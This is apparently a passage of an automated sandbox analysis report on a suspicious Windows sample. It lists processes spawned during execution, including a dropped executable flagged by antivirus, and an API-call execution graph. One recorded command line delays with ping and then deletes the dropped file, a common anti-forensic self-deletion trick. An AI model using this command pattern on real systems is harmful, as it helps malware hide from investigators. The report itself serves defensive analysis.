                                                                                                                                  Start time:03:28:51
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 992
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:29
                                                                                                                                  Start time:03:28:52
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1000
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:31
                                                                                                                                  Start time:03:28:52
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1260
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:33
                                                                                                                                  Start time:03:29:13
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:35
                                                                                                                                  Start time:03:29:14
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:37
                                                                                                                                  Start time:03:29:16
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2348
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:39
                                                                                                                                  Start time:03:29:17
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2416
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:40
                                                                                                                                  Start time:03:29:18
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                                                                                                                                  Imagebase:0x790000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:41
                                                                                                                                  Start time:03:29:18
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:43
                                                                                                                                  Start time:03:29:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                                                                                                                                  Imagebase:0x810000
                                                                                                                                  File size:17'408 bytes
                                                                                                                                  MD5 hash:C52E326B3E71B7930CF6B314D1FA1CFF
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:44
                                                                                                                                  Start time:03:29:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2364
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:45
                                                                                                                                  Start time:03:29:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                                                                                                                                  Imagebase:0x790000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:46
                                                                                                                                  Start time:03:29:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:47
                                                                                                                                  Start time:03:29:20
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:ping 2.2.2.2 -n 1 -w 3000
                                                                                                                                  Imagebase:0xce0000
                                                                                                                                  File size:18'944 bytes
                                                                                                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:17.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:20.7%
                                                                                                                                    Total number of Nodes:1528
                                                                                                                                    Total number of Limit Nodes:33
                                                                                                                                    execution_graph 4343 402fc0 4344 401446 18 API calls 4343->4344 4345 402fc7 4344->4345 4346 403017 4345->4346 4347 40300a 4345->4347 4350 401a13 4345->4350 4348 406805 18 API calls 4346->4348 4349 401446 18 API calls 4347->4349 4348->4350 4349->4350 4351 4023c1 4352 40145c 18 API calls 4351->4352 4353 4023c8 4352->4353 4356 40726a 4353->4356 4359 406ed2 CreateFileW 4356->4359 4360 406f04 4359->4360 4361 406f1e ReadFile 4359->4361 4362 4062a3 11 API calls 4360->4362 4363 4023d6 4361->4363 4366 406f84 4361->4366 4362->4363 4364 4071e3 CloseHandle 4364->4363 4365 406f9b ReadFile lstrcpynA lstrcmpA 4365->4366 4367 406fe2 SetFilePointer ReadFile 4365->4367 4366->4363 4366->4364 4366->4365 4370 406fdd 4366->4370 4367->4364 4368 4070a8 ReadFile 4367->4368 4369 407138 4368->4369 4369->4368 4369->4370 4371 40715f SetFilePointer GlobalAlloc ReadFile 4369->4371 4370->4364 4372 4071a3 4371->4372 4373 4071bf lstrcpynW GlobalFree 4371->4373 4372->4372 4372->4373 4373->4364 4374 401cc3 4375 40145c 18 API calls 4374->4375 4376 401cca lstrlenW 4375->4376 4377 4030dc 4376->4377 4378 4030e3 4377->4378 4380 405f51 wsprintfW 4377->4380 4380->4378 4395 401c46 4396 40145c 18 API calls 4395->4396 4397 401c4c 4396->4397 4398 4062a3 11 API calls 4397->4398 4399 401c59 4398->4399 4400 406c9b 81 API calls 4399->4400 4401 401c64 4400->4401 4402 403049 4403 401446 18 API calls 4402->4403 4406 403050 4403->4406 4404 406805 18 API calls 4405 401a13 4404->4405 4406->4404 4406->4405 4407 40204a 4408 401446 18 API calls 4407->4408 4409 402051 IsWindow 4408->4409 4410 4018d3 4409->4410 4411 40324c 4412 403277 4411->4412 4413 40325e SetTimer 4411->4413 4414 4032cc 4412->4414 4415 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4412->4415 4413->4412 4415->4414 4416 4048cc 4417 4048f1 4416->4417 4418 4048da 4416->4418 4420 4048ff IsWindowVisible 4417->4420 4424 404916 4417->4424 4419 4048e0 4418->4419 4434 40495a 4418->4434 4421 403daf SendMessageW 4419->4421 4423 40490c 4420->4423 4420->4434 4425 4048ea 4421->4425 4422 404960 CallWindowProcW 4422->4425 4435 40484e SendMessageW 4423->4435 4424->4422 4440 406009 lstrcpynW 4424->4440 4428 404945 4441 405f51 wsprintfW 4428->4441 4430 40494c 4431 40141d 80 API calls 4430->4431 4432 404953 4431->4432 4442 406009 lstrcpynW 4432->4442 4434->4422 4436 404871 GetMessagePos ScreenToClient SendMessageW 4435->4436 4437 4048ab SendMessageW 4435->4437 4438 4048a3 4436->4438 4439 4048a8 4436->4439 4437->4438 4438->4424 4439->4437 4440->4428 4441->4430 4442->4434 4443 4022cc 4444 40145c 18 API calls 4443->4444 4445 4022d3 4444->4445 4446 4062d5 2 API calls 4445->4446 4447 4022d9 4446->4447 4448 4022e8 4447->4448 4452 405f51 wsprintfW 4447->4452 4451 4030e3 4448->4451 4453 405f51 wsprintfW 4448->4453 4452->4448 4453->4451 4223 4050cd 4224 405295 4223->4224 4225 4050ee GetDlgItem GetDlgItem GetDlgItem 4223->4225 4226 4052c6 4224->4226 4227 40529e GetDlgItem CreateThread CloseHandle 4224->4227 4272 403d98 SendMessageW 4225->4272 4229 4052f4 4226->4229 4231 4052e0 ShowWindow ShowWindow 4226->4231 4232 405316 4226->4232 4227->4226 4275 405047 83 API calls 4227->4275 4233 405352 4229->4233 4235 405305 4229->4235 4236 40532b ShowWindow 4229->4236 4230 405162 4243 406805 18 API calls 4230->4243 4274 403d98 SendMessageW 4231->4274 4237 403dca 8 API calls 4232->4237 4233->4232 4238 40535d SendMessageW 4233->4238 4239 403d18 SendMessageW 4235->4239 4241 40534b 4236->4241 4242 40533d 4236->4242 4240 40528e 4237->4240 4238->4240 4245 405376 CreatePopupMenu 4238->4245 4239->4232 4244 403d18 SendMessageW 4241->4244 4246 404f72 25 API calls 4242->4246 4247 405181 4243->4247 4244->4233 4248 406805 18 API calls 4245->4248 4246->4241 4249 4062a3 11 API calls 4247->4249 4251 405386 AppendMenuW 4248->4251 4250 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4249->4250 4252 4051f3 4250->4252 4253 4051d7 SendMessageW SendMessageW 4250->4253 4254 405399 GetWindowRect 4251->4254 4255 4053ac 4251->4255 4256 405206 4252->4256 4257 4051f8 SendMessageW 4252->4257 4253->4252 4258 4053b3 TrackPopupMenu 4254->4258 4255->4258 4259 403d3f 19 API calls 4256->4259 4257->4256 4258->4240 4260 4053d1 4258->4260 4261 405216 4259->4261 4262 4053ed SendMessageW 4260->4262 4263 405253 GetDlgItem SendMessageW 4261->4263 4264 40521f ShowWindow 4261->4264 4262->4262 4265 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4262->4265 4263->4240 4268 405276 SendMessageW SendMessageW 4263->4268 4266 405242 4264->4266 4267 405235 ShowWindow 4264->4267 4269 40542f SendMessageW 4265->4269 4273 403d98 SendMessageW 4266->4273 4267->4266 4268->4240 4269->4269 4270 40545a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4240 4272->4230 4273->4263 4274->4229 4454 4030cf 4455 40145c 18 API calls 4454->4455 4456 4030d6 4455->4456 4458 4030dc 4456->4458 4461 4063ac GlobalAlloc lstrlenW 4456->4461 4459 4030e3 4458->4459 4488 405f51 wsprintfW 4458->4488 4462 4063e2 4461->4462 4463 406434 4461->4463 4464 40640f GetVersionExW 4462->4464 4489 40602b CharUpperW 4462->4489 4463->4458 4464->4463 4465 40643e 4464->4465 4466 406464 LoadLibraryA 4465->4466 4467 40644d 4465->4467 4466->4463 4470 406482 GetProcAddress GetProcAddress GetProcAddress 4466->4470 4467->4463 4469 406585 GlobalFree 4467->4469 4471 40659b LoadLibraryA 4469->4471 4472 4066dd FreeLibrary 4469->4472 4475 4064aa 4470->4475 4478 4065f5 4470->4478 4471->4463 4474 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4471->4474 4472->4463 4473 406651 FreeLibrary 4482 40662a 4473->4482 4474->4478 4476 4064ce FreeLibrary GlobalFree 4475->4476 4475->4478 4484 4064ea 4475->4484 4476->4463 4477 4066ea 4480 4066ef CloseHandle FreeLibrary 4477->4480 4478->4473 4478->4482 4479 4064fc lstrcpyW OpenProcess 4481 40654f CloseHandle CharUpperW lstrcmpW 4479->4481 4479->4484 4483 406704 CloseHandle 4480->4483 4481->4478 4481->4484 4482->4477 4485 406685 lstrcmpW 4482->4485 4486 4066b6 CloseHandle 4482->4486 4487 4066d4 CloseHandle 4482->4487 4483->4480 4484->4469 4484->4479 4484->4481 4485->4482 4485->4483 4486->4482 4487->4472 4488->4459 4489->4462 4490 407752 4494 407344 4490->4494 4491 407c6d 4492 4073c2 GlobalFree 4493 4073cb GlobalAlloc 4492->4493 4493->4491 4493->4494 4494->4491 4494->4492 4494->4493 4494->4494 4495 407443 GlobalAlloc 4494->4495 4496 40743a GlobalFree 4494->4496 4495->4491 4495->4494 4496->4495 4497 401dd3 4498 401446 18 API calls 4497->4498 4499 401dda 4498->4499 4500 401446 18 API calls 4499->4500 4501 4018d3 4500->4501 4509 402e55 4510 40145c 18 API calls 4509->4510 4511 402e63 4510->4511 4512 402e79 4511->4512 4513 40145c 18 API calls 4511->4513 4514 405e30 2 API calls 4512->4514 4513->4512 4515 402e7f 4514->4515 4539 405e50 GetFileAttributesW CreateFileW 4515->4539 4517 402e8c 4518 402f35 4517->4518 4519 402e98 GlobalAlloc 4517->4519 4522 4062a3 11 API calls 4518->4522 4520 402eb1 4519->4520 4521 402f2c CloseHandle 4519->4521 4540 403368 SetFilePointer 4520->4540 4521->4518 4524 402f45 4522->4524 4526 402f50 DeleteFileW 4524->4526 4527 402f63 4524->4527 4525 402eb7 4529 403336 ReadFile 4525->4529 4526->4527 4541 401435 4527->4541 4530 402ec0 GlobalAlloc 4529->4530 4531 402ed0 4530->4531 4532 402f04 WriteFile GlobalFree 4530->4532 4533 40337f 37 API calls 4531->4533 4534 40337f 37 API calls 4532->4534 4538 402edd 4533->4538 4535 402f29 4534->4535 4535->4521 4537 402efb GlobalFree 4537->4532 4538->4537 4539->4517 4540->4525 4542 404f72 25 API calls 4541->4542 4543 401443 4542->4543 4544 401cd5 4545 401446 18 API calls 4544->4545 4546 401cdd 4545->4546 4547 401446 18 API calls 4546->4547 4548 401ce8 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401cf1 4549->4550 4551 401d07 lstrlenW 4550->4551 4552 401d43 4550->4552 4553 401d11 4551->4553 4553->4552 4557 406009 lstrcpynW 4553->4557 4555 401d2c 4555->4552 4556 401d39 lstrlenW 4555->4556 4556->4552 4557->4555 4558 403cd6 4559 403ce1 4558->4559 4560 403ce5 4559->4560 4561 403ce8 GlobalAlloc 4559->4561 4561->4560 4562 402cd7 4563 401446 18 API calls 4562->4563 4566 402c64 4563->4566 4564 402d99 4565 402d17 ReadFile 4565->4566 4566->4562 4566->4564 4566->4565 4567 402dd8 4568 402ddf 4567->4568 4569 4030e3 4567->4569 4570 402de5 FindClose 4568->4570 4570->4569 4571 401d5c 4572 40145c 18 API calls 4571->4572 4573 401d63 4572->4573 4574 40145c 18 API calls 4573->4574 4575 401d6c 4574->4575 4576 401d73 lstrcmpiW 4575->4576 4577 401d86 lstrcmpW 4575->4577 4578 401d79 4576->4578 4577->4578 4579 401c99 4577->4579 4578->4577 4578->4579 4281 407c5f 4282 407344 4281->4282 4283 4073c2 GlobalFree 4282->4283 4284 4073cb GlobalAlloc 4282->4284 4285 407c6d 4282->4285 4286 407443 GlobalAlloc 4282->4286 4287 40743a GlobalFree 4282->4287 4283->4284 4284->4282 4284->4285 4286->4282 4286->4285 4287->4286 4580 404363 4581 404373 4580->4581 4582 40439c 4580->4582 4584 403d3f 19 API calls 4581->4584 4583 403dca 8 API calls 4582->4583 4585 4043a8 4583->4585 4586 404380 SetDlgItemTextW 4584->4586 4586->4582 4587 4027e3 4588 4027e9 4587->4588 4589 4027f2 4588->4589 4590 402836 4588->4590 4603 401553 4589->4603 4591 40145c 18 API calls 4590->4591 4593 40283d 4591->4593 4595 4062a3 11 API calls 4593->4595 4594 4027f9 4596 40145c 18 API calls 4594->4596 4601 401a13 4594->4601 4597 40284d 4595->4597 4598 40280a RegDeleteValueW 4596->4598 4607 40149d RegOpenKeyExW 4597->4607 4599 4062a3 11 API calls 4598->4599 4602 40282a RegCloseKey 4599->4602 4602->4601 4604 401563 4603->4604 4605 40145c 18 API calls 4604->4605 4606 401589 RegOpenKeyExW 4605->4606 4606->4594 4613 401515 4607->4613 4615 4014c9 4607->4615 4608 4014ef RegEnumKeyW 4609 401501 RegCloseKey 4608->4609 4608->4615 4610 4062fc 3 API calls 4609->4610 4612 401511 4610->4612 4611 401526 RegCloseKey 4611->4613 4612->4613 4616 401541 RegDeleteKeyW 4612->4616 4613->4601 4614 40149d 3 API calls 4614->4615 4615->4608 4615->4609 4615->4611 4615->4614 4616->4613 4617 403f64 4618 403f90 4617->4618 4619 403f74 4617->4619 4621 403fc3 4618->4621 4622 403f96 SHGetPathFromIDListW 4618->4622 4628 405c84 GetDlgItemTextW 4619->4628 4624 403fad SendMessageW 4622->4624 4625 403fa6 4622->4625 4623 403f81 SendMessageW 4623->4618 4624->4621 4626 40141d 80 API calls 4625->4626 4626->4624 4628->4623 4629 402ae4 4630 402aeb 4629->4630 4631 4030e3 4629->4631 4632 402af2 CloseHandle 4630->4632 4632->4631 4633 402065 4634 401446 18 API calls 4633->4634 4635 40206d 4634->4635 4636 401446 18 API calls 4635->4636 4637 402076 GetDlgItem 4636->4637 4638 4030dc 4637->4638 4639 4030e3 4638->4639 4641 405f51 wsprintfW 4638->4641 4641->4639 4642 402665 4643 40145c 18 API calls 4642->4643 4644 40266b 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402674 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40267d 4647->4648 4649 4062a3 11 API calls 4648->4649 4650 40268c 4649->4650 4651 4062d5 2 API calls 4650->4651 4652 402695 4651->4652 4653 4026a6 lstrlenW lstrlenW 4652->4653 4654 404f72 25 API calls 4652->4654 4657 4030e3 4652->4657 4655 404f72 25 API calls 4653->4655 4654->4652 4656 4026e8 SHFileOperationW 4655->4656 4656->4652 4656->4657 4665 401c69 4666 40145c 18 API calls 4665->4666 4667 401c70 4666->4667 4668 4062a3 11 API calls 4667->4668 4669 401c80 4668->4669 4670 405ca0 MessageBoxIndirectW 4669->4670 4671 401a13 4670->4671 4679 402f6e 4680 402f72 4679->4680 4681 402fae 4679->4681 4682 4062a3 11 API calls 4680->4682 4683 40145c 18 API calls 4681->4683 4684 402f7d 4682->4684 4689 402f9d 4683->4689 4685 4062a3 11 API calls 4684->4685 4686 402f90 4685->4686 4687 402fa2 4686->4687 4688 402f98 4686->4688 4691 4060e7 9 API calls 4687->4691 4690 403e74 5 API calls 4688->4690 4690->4689 4691->4689 4692 4023f0 4693 402403 4692->4693 4694 4024da 4692->4694 4695 40145c 18 API calls 4693->4695 4696 404f72 25 API calls 4694->4696 4697 40240a 4695->4697 4702 4024f1 4696->4702 4698 40145c 18 API calls 4697->4698 4699 402413 4698->4699 4700 402429 LoadLibraryExW 4699->4700 4701 40241b GetModuleHandleW 4699->4701 4703 40243e 4700->4703 4704 4024ce 4700->4704 4701->4700 4701->4703 4716 406365 GlobalAlloc WideCharToMultiByte 4703->4716 4705 404f72 25 API calls 4704->4705 4705->4694 4707 402449 4708 40248c 4707->4708 4709 40244f 4707->4709 4710 404f72 25 API calls 4708->4710 4712 401435 25 API calls 4709->4712 4714 40245f 4709->4714 4711 402496 4710->4711 4713 4062a3 11 API calls 4711->4713 4712->4714 4713->4714 4714->4702 4715 4024c0 FreeLibrary 4714->4715 4715->4702 4717 406390 GetProcAddress 4716->4717 4718 40639d GlobalFree 4716->4718 4717->4718 4718->4707 4719 402df3 4720 402dfa 4719->4720 4722 4019ec 4719->4722 4721 402e07 FindNextFileW 4720->4721 4721->4722 4723 402e16 4721->4723 4725 406009 lstrcpynW 4723->4725 4725->4722 4078 402175 4079 401446 18 API calls 4078->4079 4080 40217c 4079->4080 4081 401446 18 API calls 4080->4081 4082 402186 4081->4082 4083 4062a3 11 API calls 4082->4083 4087 402197 4082->4087 4083->4087 4084 4021aa EnableWindow 4086 4030e3 4084->4086 4085 40219f ShowWindow 4085->4086 4087->4084 4087->4085 4733 404077 4734 404081 4733->4734 4735 404084 lstrcpynW lstrlenW 4733->4735 4734->4735 4104 405479 4105 405491 4104->4105 4106 4055cd 4104->4106 4105->4106 4107 40549d 4105->4107 4108 40561e 4106->4108 4109 4055de GetDlgItem GetDlgItem 4106->4109 4110 4054a8 SetWindowPos 4107->4110 4111 4054bb 4107->4111 4113 405678 4108->4113 4121 40139d 80 API calls 4108->4121 4174 403d3f 4109->4174 4110->4111 4115 4054c0 ShowWindow 4111->4115 4116 4054d8 4111->4116 4114 403daf SendMessageW 4113->4114 4134 4055c8 4113->4134 4144 40568a 4114->4144 4115->4116 4118 4054e0 DestroyWindow 4116->4118 4119 4054fa 4116->4119 4117 405608 KiUserCallbackDispatcher 4120 40141d 80 API calls 4117->4120 4173 4058dc 4118->4173 4122 405510 4119->4122 4123 4054ff SetWindowLongW 4119->4123 4120->4108 4124 405650 4121->4124 4127 4055b9 4122->4127 4128 40551c GetDlgItem 4122->4128 4123->4134 4124->4113 4129 405654 SendMessageW 4124->4129 4125 40141d 80 API calls 4125->4144 4126 4058de DestroyWindow KiUserCallbackDispatcher 4126->4173 4183 403dca 4127->4183 4132 40554c 4128->4132 4133 40552f SendMessageW IsWindowEnabled 4128->4133 4129->4134 4131 40590d ShowWindow 4131->4134 4136 405559 4132->4136 4137 4055a0 SendMessageW 4132->4137 4138 40556c 4132->4138 4147 405551 4132->4147 4133->4132 4133->4134 4135 406805 18 API calls 4135->4144 4136->4137 4136->4147 4137->4127 4141 405574 4138->4141 4142 405589 4138->4142 4140 403d3f 19 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4146 40141d 80 API calls 4142->4146 4143 405587 4143->4127 4144->4125 4144->4126 4144->4134 4144->4135 4144->4140 4149 403d3f 19 API calls 4144->4149 4164 40581e DestroyWindow 4144->4164 4145->4147 4148 405590 4146->4148 4180 403d18 4147->4180 4148->4127 4148->4147 4150 405705 GetDlgItem 4149->4150 4151 405723 ShowWindow KiUserCallbackDispatcher 4150->4151 4152 40571a 4150->4152 4177 403d85 KiUserCallbackDispatcher 4151->4177 4152->4151 4154 40574d EnableWindow 4157 405761 4154->4157 4155 405766 GetSystemMenu EnableMenuItem SendMessageW 4156 405796 SendMessageW 4155->4156 4155->4157 4156->4157 4157->4155 4178 403d98 SendMessageW 4157->4178 4179 406009 lstrcpynW 4157->4179 4160 4057c4 lstrlenW 4161 406805 18 API calls 4160->4161 4162 4057da SetWindowTextW 4161->4162 4163 40139d 80 API calls 4162->4163 4163->4144 4165 405838 CreateDialogParamW 4164->4165 4164->4173 4166 40586b 4165->4166 4165->4173 4167 403d3f 19 API calls 4166->4167 4168 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 40139d 80 API calls 4168->4169 4170 4058bc 4169->4170 4170->4134 4171 4058c4 ShowWindow 4170->4171 4172 403daf SendMessageW 4171->4172 4172->4173 4173->4131 4173->4134 4175 406805 18 API calls 4174->4175 4176 403d4a SetDlgItemTextW 4175->4176 4176->4117 4177->4154 4178->4157 4179->4160 4181 403d25 SendMessageW 4180->4181 4182 403d1f 4180->4182 4181->4143 4182->4181 4184 403ddf GetWindowLongW 4183->4184 4194 403e68 4183->4194 4185 403df0 4184->4185 4184->4194 4186 403e02 4185->4186 4187 403dff GetSysColor 4185->4187 4188 403e12 SetBkMode 4186->4188 4189 403e08 SetTextColor 4186->4189 4187->4186 4190 403e30 4188->4190 4191 403e2a GetSysColor 4188->4191 4189->4188 4192 403e41 4190->4192 4193 403e37 SetBkColor 4190->4193 4191->4190 4192->4194 4195 403e54 DeleteObject 4192->4195 4196 403e5b CreateBrushIndirect 4192->4196 4193->4192 4194->4134 4195->4196 4196->4194 4736 4020f9 GetDC GetDeviceCaps 4737 401446 18 API calls 4736->4737 4738 402116 MulDiv 4737->4738 4739 401446 18 API calls 4738->4739 4740 40212c 4739->4740 4741 406805 18 API calls 4740->4741 4742 402165 CreateFontIndirectW 4741->4742 4743 4030dc 4742->4743 4744 4030e3 4743->4744 4746 405f51 wsprintfW 4743->4746 4746->4744 4747 4024fb 4748 40145c 18 API calls 4747->4748 4749 402502 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40250c 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402515 4752->4753 4754 40145c 18 API calls 4753->4754 4755 40251f 4754->4755 4756 40145c 18 API calls 4755->4756 4757 402529 4756->4757 4758 40253d 4757->4758 4759 40145c 18 API calls 4757->4759 4760 4062a3 11 API calls 4758->4760 4759->4758 4761 40256a CoCreateInstance 4760->4761 4762 40258c 4761->4762 4763 40497c GetDlgItem GetDlgItem 4764 4049d2 7 API calls 4763->4764 4769 404bea 4763->4769 4765 404a76 DeleteObject 4764->4765 4766 404a6a SendMessageW 4764->4766 4767 404a81 4765->4767 4766->4765 4770 404ab8 4767->4770 4772 406805 18 API calls 4767->4772 4768 404ccf 4771 404d74 4768->4771 4776 404bdd 4768->4776 4781 404d1e SendMessageW 4768->4781 4769->4768 4779 40484e 5 API calls 4769->4779 4792 404c5a 4769->4792 4775 403d3f 19 API calls 4770->4775 4773 404d89 4771->4773 4774 404d7d SendMessageW 4771->4774 4778 404a9a SendMessageW SendMessageW 4772->4778 4783 404da2 4773->4783 4784 404d9b ImageList_Destroy 4773->4784 4794 404db2 4773->4794 4774->4773 4780 404acc 4775->4780 4782 403dca 8 API calls 4776->4782 4777 404cc1 SendMessageW 4777->4768 4778->4767 4779->4792 4785 403d3f 19 API calls 4780->4785 4781->4776 4787 404d33 SendMessageW 4781->4787 4788 404f6b 